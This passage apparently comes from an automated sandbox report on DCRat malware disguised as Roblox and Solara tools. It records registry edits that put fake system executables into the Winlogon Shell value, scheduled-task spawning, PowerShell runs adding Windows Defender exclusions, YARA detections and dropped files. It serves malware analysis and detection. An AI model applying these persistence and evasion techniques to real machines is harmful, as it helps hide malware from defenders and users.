\"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\", \"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\"" Refcrt.exe -
Process spawned unexpected child process 64 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1668 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1716 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2224 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2280 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2900 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1460 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1736 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1792 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2096 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1680 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 904 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 896 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2464 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1704 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2548 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2752 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2840 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2540 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1820 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1584 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1868 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1928 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 600 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1676 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2876 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 108 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 292 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2580 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2156 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2116 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2524 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2572 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2616 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2436 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2368 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2228 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1916 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2880 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1912 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2068 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2116 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1520 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2148 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1852 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1104 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 904 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2696 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 792 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1548 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2044 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 968 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2428 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1904 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2100 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2144 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1856 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2112 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2504 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3024 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2348 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2856 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1460 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2260 320 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2400 320 schtasks.exe -
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\Youtube.exe dcrat behavioral1/memory/2756-18-0x0000000000400000-0x0000000000D8F000-memory.dmp dcrat C:\Users\Admin\AppData\Local\Temp\Result.exe dcrat \Users\Admin\AppData\Local\Temp\solara.exe dcrat behavioral1/memory/2544-72-0x0000000000400000-0x000000000069B000-memory.dmp dcrat behavioral1/memory/2124-107-0x0000000000350000-0x00000000004D4000-memory.dmp dcrat C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe dcrat behavioral1/memory/2692-68-0x0000000000400000-0x0000000000CC7000-memory.dmp dcrat behavioral1/memory/484-301-0x0000000001110000-0x0000000001294000-memory.dmp dcrat behavioral1/memory/1544-927-0x0000000000360000-0x00000000004E4000-memory.dmp dcrat behavioral1/memory/1428-4033-0x0000000000D30000-0x0000000000EB4000-memory.dmp dcrat behavioral1/memory/2692-4456-0x0000000000250000-0x00000000003D4000-memory.dmp dcrat behavioral1/memory/1828-5044-0x0000000001000000-0x0000000001184000-memory.dmp dcrat behavioral1/memory/2988-5045-0x0000000001200000-0x0000000001384000-memory.dmp dcrat behavioral1/memory/2248-5763-0x0000000000BC0000-0x0000000000D44000-memory.dmp dcrat behavioral1/memory/1748-5897-0x0000000000D40000-0x0000000000EC4000-memory.dmp dcrat behavioral1/memory/964-5933-0x0000000000270000-0x00000000003F4000-memory.dmp dcrat behavioral1/memory/304-6191-0x0000000000280000-0x0000000000404000-memory.dmp dcrat behavioral1/memory/2832-6774-0x0000000001210000-0x0000000001394000-memory.dmp dcrat behavioral1/memory/2880-7333-0x0000000000F40000-0x00000000010C4000-memory.dmp dcrat behavioral1/memory/1012-7365-0x0000000000D00000-0x0000000000E84000-memory.dmp dcrat behavioral1/memory/2416-7547-0x0000000000EB0000-0x0000000001034000-memory.dmp dcrat behavioral1/memory/2300-7936-0x0000000001120000-0x00000000012A4000-memory.dmp dcrat behavioral1/memory/2908-7940-0x00000000001C0000-0x0000000000344000-memory.dmp dcrat behavioral1/memory/2076-8124-0x0000000000E40000-0x0000000000FC4000-memory.dmp dcrat behavioral1/memory/1224-8514-0x00000000000B0000-0x0000000000234000-memory.dmp dcrat behavioral1/memory/996-8698-0x0000000000E10000-0x0000000000F94000-memory.dmp dcrat behavioral1/memory/820-8748-0x00000000008E0000-0x0000000000A64000-memory.dmp dcrat behavioral1/memory/2228-9195-0x00000000003E0000-0x0000000000564000-memory.dmp dcrat behavioral1/memory/1932-11064-0x0000000000CF0000-0x0000000000E74000-memory.dmp dcrat behavioral1/memory/2260-11065-0x00000000009C0000-0x0000000000B44000-memory.dmp dcrat behavioral1/memory/928-11076-0x00000000000E0000-0x0000000000264000-memory.dmp dcrat behavioral1/memory/2384-11122-0x0000000000090000-0x0000000000214000-memory.dmp dcrat behavioral1/memory/1916-11487-0x0000000000ED0000-0x0000000001054000-memory.dmp dcrat behavioral1/memory/1528-11489-0x00000000012B0000-0x0000000001434000-memory.dmp dcrat behavioral1/memory/1012-13197-0x00000000011D0000-0x0000000001354000-memory.dmp dcrat behavioral1/memory/596-13775-0x00000000001E0000-0x0000000000364000-memory.dmp dcrat behavioral1/memory/852-14927-0x0000000000C20000-0x0000000000DA4000-memory.dmp dcrat behavioral1/memory/3028-15642-0x00000000010A0000-0x0000000001224000-memory.dmp dcrat behavioral1/memory/1944-16027-0x0000000000A40000-0x0000000000BC4000-memory.dmp dcrat behavioral1/memory/1256-16217-0x00000000001D0000-0x0000000000354000-memory.dmp dcrat behavioral1/memory/824-16361-0x0000000000300000-0x0000000000484000-memory.dmp dcrat behavioral1/memory/1856-16847-0x0000000000890000-0x0000000000A14000-memory.dmp dcrat behavioral1/memory/1896-16895-0x0000000000AF0000-0x0000000000C74000-memory.dmp dcrat behavioral1/memory/1400-17362-0x0000000000210000-0x0000000000394000-memory.dmp dcrat behavioral1/memory/1572-17368-0x00000000012E0000-0x0000000001464000-memory.dmp dcrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 63 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2068 powershell.exe 1316 powershell.exe 1148 powershell.exe 2100 powershell.exe 1100 powershell.exe 2144 powershell.exe 560 powershell.exe 2184 powershell.exe 2020 powershell.exe 2524 powershell.exe 2596 powershell.exe 1364 powershell.exe 2612 powershell.exe 2332 powershell.exe 1752 powershell.exe 788 powershell.exe 2336 powershell.exe 2004 powershell.exe 292 powershell.exe 2968 powershell.exe 2328 powershell.exe 2856 powershell.exe 2484 powershell.exe 916 powershell.exe 2936 powershell.exe 1460 powershell.exe 840 powershell.exe 2580 powershell.exe 1664 powershell.exe 1316 powershell.exe 964 powershell.exe 1724 powershell.exe 1128 powershell.exe 2452 powershell.exe 1436 powershell.exe 1860 powershell.exe 1772 powershell.exe 1852 powershell.exe 1688 powershell.exe 2588 powershell.exe 1056 powershell.exe 2556 powershell.exe 1256 powershell.exe 2484 powershell.exe 2112 powershell.exe 2908 powershell.exe 1104 powershell.exe 700 powershell.exe 2132 powershell.exe 816 powershell.exe 2412 powershell.exe 1904 powershell.exe 2128 powershell.exe 1520 powershell.exe 2068 powershell.exe 1608 powershell.exe 1620 powershell.exe 408 powershell.exe 2088 powershell.exe 2396 powershell.exe 2192 powershell.exe 1756 powershell.exe 1640 powershell.exe -
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
.NET Reactor proctector 3 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\Youtube.exe net_reactor behavioral1/memory/2756-18-0x0000000000400000-0x0000000000D8F000-memory.dmp net_reactor behavioral1/memory/2692-68-0x0000000000400000-0x0000000000CC7000-memory.dmp net_reactor -
Executes dropped EXE 64 IoCs
Processes:
Youtube.exesddsfsdf.exeResult.exeDCRatBuild.exeSolaraBootstrapper.exeBloxstrap.exeFrage build.exesolara.exeRefcrt.exeRefcrt.exeComContainerbrowserRefRuntime.exeRoblox.exeRefcrt.exeBloxstrap.exewscript.execsrss.exewscript.exe.exeaudiodg.execsrss.exewscript.exe.exesihost64.exewscript.exewscript.exe.execsrss.exelsm.exeaudiodg.exelsm.exe.execsrss.exesddsfsdf.exemsiexec.exespoolsv.exeRefcrt.exeBloxstrap.exewininit.exeRefcrt.exe.exeBloxstrap.exe.execsrss.exewininit.exe.execsrss.execsrss.exewscript.exeIdle.exewscript.exe.execsrss.execmd.exeaudiodg.execonhost.exelsm.exeexplorer.exelsm.exe.execsrss.exesddsfsdf.exeWmiPrvSE.exelsass.exelsass.exe.execsrss.execsrss.exedwm.exedllhost.exeservices.exedwm.exe.exeservices.exe.execsrss.execsrss.exepid process 2692 Youtube.exe 2736 sddsfsdf.exe 2544 Result.exe 2588 DCRatBuild.exe 2272 SolaraBootstrapper.exe 1504 Bloxstrap.exe 2972 Frage build.exe 1512 solara.exe 2124 Refcrt.exe 484 Refcrt.exe 2148 ComContainerbrowserRefRuntime.exe 560 Roblox.exe 1668 Refcrt.exe 1764 Bloxstrap.exe 1708 wscript.exe 1860 csrss.exe 1820 wscript.exe.exe 1544 audiodg.exe 1768 csrss.exe 1708 wscript.exe.exe 2332 sihost64.exe 2132 wscript.exe 2312 wscript.exe.exe 2760 csrss.exe 2412 lsm.exe 2832 audiodg.exe 1428 lsm.exe.exe 2324 csrss.exe 2692 sddsfsdf.exe 1828 msiexec.exe 2988 spoolsv.exe 1688 Refcrt.exe 3024 Bloxstrap.exe 904 wininit.exe 2248 Refcrt.exe.exe 1748 Bloxstrap.exe.exe 2884 csrss.exe 964 wininit.exe.exe 944 csrss.exe 684 csrss.exe 1664 wscript.exe 304 Idle.exe 2412 wscript.exe.exe 2100 csrss.exe 2832 cmd.exe 2796 audiodg.exe 2880 conhost.exe 2192 lsm.exe 1012 explorer.exe 2416 lsm.exe.exe 2612 csrss.exe 2300 sddsfsdf.exe 2908 WmiPrvSE.exe 1656 lsass.exe 2076 lsass.exe.exe 708 csrss.exe 2064 csrss.exe 304 dwm.exe 1224 dllhost.exe 184 services.exe 996 